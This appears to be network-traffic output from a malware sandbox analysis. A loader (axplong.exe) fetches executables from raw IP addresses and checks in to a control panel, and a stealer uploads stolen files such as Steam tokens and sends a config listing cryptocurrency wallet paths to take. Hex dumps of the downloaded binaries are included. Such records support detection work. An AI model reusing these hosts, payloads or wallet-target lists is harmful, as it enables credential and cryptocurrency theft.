                                                                                                                                                                                                                                        Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.108472109 CEST463OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 265
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"files------AFBFHDBKJEGHJJJKFIIJ--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.287020922 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:16 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=83
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.336527109 CEST561OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.518029928 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:16 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=82
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.695674896 CEST201OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 114463
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.101169109 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:16 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=81
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.149300098 CEST468OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 270
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"jbdtaijovg------KFHJJJKKFHIDAAKFBFBF--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.331065893 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:17 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=80
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        13192.168.2.55898277.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.327316046 CEST56OUTGET /lend/build16666.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044408083 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1743872
                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Jul 2024 00:56:44 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "668c8acc-1a9c00"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 ea 7e 8c 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 4e 19 00 00 98 1a 00 00 60 06 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 60 21 00 00 04 00 00 22 19 1b 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 21 00 64 06 00 00 00 40 21 00 38 01 00 00 00 20 1a 00 74 46 00 00 00 00 00 00 00 00 00 00 00 50 21 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd~f.N`@`!"` !d@!8 tFP!$(!p.textXMN``.data@`R@.rdatap\@@.pdatatF H@@.xdata;p<N@@.bss^.idatad!@.CRTh !@.tls0!@.rsrc8@!@.reloc$P!@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044431925 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 45 09
                                                                                                                                                                                                                                        Data Ascii: ff.@H(HE1HFHIHHf8MZuHcP<H8PEtiHuFK7LHLHp:H 8tS1H
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044446945 CEST1236INData Raw: 0f 1f 44 00 00 48 8b 15 59 03 1a 00 48 8b 0d 42 03 1a 00 c7 06 01 00 00 00 e8 67 47 19 00 e9 70 fd ff ff 89 c1 e8 3b 47 19 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 65 04 1a 00 c7 00 01 00 00 00 e8 aa fc ff ff 90 90 48 83 c4 28 c3
                                                                                                                                                                                                                                        Data Ascii: DHYHBgGp;Gf.H(HeH(H(HEH(H(FHH(H@H(HL$ HHL$ H(8HHT$hHL$pHHH
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044461966 CEST1236INData Raw: 09 48 89 4c 24 58 48 8b 48 08 48 8b 00 48 39 c1 48 89 44 24 60 0f 8f 17 00 00 00 48 8b 4c 24 68 e8 da 27 01 00 48 8b 44 24 68 48 8b 00 48 89 44 24 60 48 8b 4c 24 58 4c 8b 4c 24 78 48 8b 44 24 68 48 8b 54 24 60 48 8b 40 10 49 89 d2 49 c1 e2 04 49
                                                                                                                                                                                                                                        Data Ascii: HL$XHHHH9HD$`HL$h'HD$hHHD$`HL$XLL$xHD$hHT$`H@IIIMMIILHHH*XeiH+XeiH1H04I#9kZ$L1H1H&I&L1Ir~Z`Ir~Z`M1L)H)HH)HL$PHHHH1H!HZzI
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044477940 CEST1236INData Raw: 31 c2 48 09 c8 48 b9 5c 0e fd 93 d2 76 3c d7 49 b8 52 2c 3c 3a 02 aa f8 de 4c 31 c1 48 09 d1 48 ba 49 6b c2 d8 a6 18 0d 40 49 b8 b6 94 3d 27 59 e7 f2 bf 4c 31 c2 48 31 d0 48 21 c8 48 83 f8 00 0f 8d 0a 00 00 00 e8 02 87 00 00 e9 0d 00 00 00 48 8b
                                                                                                                                                                                                                                        Data Ascii: 1HH\v<IR,<:L1HHIk@I='YL1H1H!HHD$hHL$(HHH(HL$ HpUHL$ H(CHHT$hHL$pHHHD$xHAH$HHD$hH$HHL$XHHHH9HD$`HL$h:"H
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044507980 CEST1236INData Raw: 9c b0 ad 9a 4d 31 c8 4c 29 c1 48 29 ca 48 89 c1 48 83 c1 01 49 b8 5b 25 c2 36 09 12 28 21 49 b9 a4 da 3d c9 f6 ed d7 de 4d 31 c8 4c 31 c0 48 09 d0 48 01 c8 48 83 f8 00 0f 8d 0a 00 00 00 e8 36 82 00 00 e9 0d 00 00 00 48 8b 44 24 68 48 8b 4c 24 28
                                                                                                                                                                                                                                        Data Ascii: M1L)H)HHI[%6(!I=M1L1HHH6HD$hHL$(HHH(HL$ HHL$ H(EHHT$hHL$pHHHD$xHAH$HHD$hH$HHL$XHHHH9HD$`HL$hnHD$hHH
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044523954 CEST776INData Raw: d0 48 ba 25 f1 ce f4 67 e2 f5 75 49 b9 27 f1 ce f4 67 e2 f5 75 4c 31 ca 49 0f af d0 49 b8 ec 45 95 21 b8 1d 0a 4d 49 b9 13 ba 6a de 47 e2 f5 b2 4d 31 c8 4c 01 c1 48 29 d1 48 09 c0 48 ba ec 2b cc 3e bb ea f4 ba 49 b8 13 d4 33 c1 44 15 0b 45 4c 31
                                                                                                                                                                                                                                        Data Ascii: H%guI'guL1IIE!MIjGM1LH)HH+>I3DEL1H1HHHHHZ$A7HZ$A7H1H9}HD$hHL$(HHH(HL$ Ho{HL$ H(!HHT$hHL$pHHHD$xHAH$H
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044539928 CEST1236INData Raw: 89 c8 49 c1 e0 04 4c 01 c0 48 83 c0 08 48 89 10 48 ba f2 dd b9 0a 66 23 33 ff 48 b8 f3 dd b9 0a 66 23 33 ff 48 31 c2 48 89 c8 48 01 d0 48 89 44 24 28 48 83 f1 ff 48 21 c8 48 b9 d1 6a 3f db d1 92 ef 36 48 ba d1 6a 3f db d1 92 ef 36 48 31 d1 48 39
                                                                                                                                                                                                                                        Data Ascii: ILHHHf#3Hf#3H1HHHD$(HH!Hj?6Hj?6H1H9?zHD$hHL$(HHH(HL$ HxHL$ H("HHT$hHL$pHHHD$xHAH$HHD$hH$HHL$XHHHH9HD$
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044555902 CEST1236INData Raw: 0f af c1 49 b8 85 eb 78 a9 33 b6 54 d2 48 b9 84 eb 78 a9 33 b6 54 d2 49 31 c8 48 89 d1 4c 31 c1 48 01 c1 48 89 4c 24 28 48 b8 59 e3 b9 1a b2 f8 74 2e 49 b8 a6 1c 46 e5 4d 07 8b d1 4c 31 c0 48 31 c2 49 b8 8f fa 62 2e 37 39 e3 94 48 b8 70 05 9d d1
                                                                                                                                                                                                                                        Data Ascii: Ix3THx3TI1HL1HHL$(HYt.IFML1H1Ib.79HpkI1HL1I6gUiI*FM1IM1LH!HDP?$nICL1H1HeSI?EyL1H1HHHtHD$hHL$(HHUHpHl$pHM
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.044570923 CEST1236INData Raw: 89 45 d0 48 8b 00 48 89 45 d8 48 b9 94 ca 69 7e 4d 29 07 38 48 ba 84 ca 69 7e 4d 29 07 38 48 31 d1 48 39 c8 0f 82 a9 00 00 00 48 8b 55 d8 48 b9 2c d4 1b d2 bd 92 44 d9 48 89 d0 48 29 c8 48 b9 de 99 6f 6b 61 2a e8 de 49 b8 2e 66 90 94 9e d5 17 21
                                                                                                                                                                                                                                        Data Ascii: EHHEHi~M)8Hi~M)8H1H9HUH,DHH)Hoka*I.f!L1HH,DHHEHH1HH0 H YpH _HUHEHMHL1H H 1HUHELH HEH
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.050012112 CEST1236INData Raw: c4 20 48 8b 45 e0 48 8b 4d e8 48 8b 50 28 48 89 11 48 8b 40 30 48 89 41 08 48 83 ec 20 e8 a3 07 01 00 48 8b 45 e0 48 83 c4 20 48 89 c1 48 83 c1 38 48 89 4d b0 48 8b 40 38 48 89 45 b8 48 8b 05 75 df 19 00 8b 08 48 83 ec 20 e8 56 6a 00 00 48 83 c4
                                                                                                                                                                                                                                        Data Ascii: HEHMHP(HH@0HAH HEH HH8HMH@8HEHuH VjH HEH;HEH/|SPH.omH1HHEHHEH_EH_EH1H9LELHHEHL!H7pgI5pgL1HHLH)HHQ


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        14192.168.2.55898377.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.333580971 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000210001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:08.052978039 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        15192.168.2.55898543.153.49.4988886360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:08.225328922 CEST64OUTGET /down/1qWbf4Bsej2u.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 43.153.49.49:8888
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:08.816710949 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=malwareterminator.exe
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 9044480
                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Jul 2024 16:52:05 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache, max-age=0
                                                                                                                                                                                                                                        Expires: Sat, 13 Jul 2024 05:07:08 GMT
                                                                                                                                                                                                                                        ETag: "1720543925.858068-9044480-4009102778"
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:08 GMT
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                        Set-Cookie: c50233950c3f39bd96d165eee1995d77=7d1ca6fd-988a-4c5d-8fa3-4819fb68e293.GnPbrHdIWIEVe5YevsRskVA_fvc; Expires=Mon, 12 Aug 2024 05:07:08 GMT; HttpOnly; Path=/
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 bc 30 00 00 fe 89 00 00 fa 08 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 93 00 00 04 00 00 e0 48 8a 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 50 90 00 4e 00 00 00 00 60 90 00 58 14 00 00 00 a0 90 00 4c a9 01 00 00 00 86 00 2c 36 01 00 00 00 00 00 00 00 00 00 00 50 92 00 f8 1b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 e5 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$0@pH` PN`XL,6P@(dX.text00```.data5060@`.rdatapO6O5@`@.pdata,68@0@.xdataP@@0@.bss@P`.edataNP


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        16192.168.2.55898777.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:11.784414053 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 31 3d 31 30 30 30 32 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e1=1000219001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:12.485552073 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:12 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        17192.168.2.558988185.172.128.116806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:12.494908094 CEST55OUTGET /Freshbuild.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152534962 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:13 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 424960
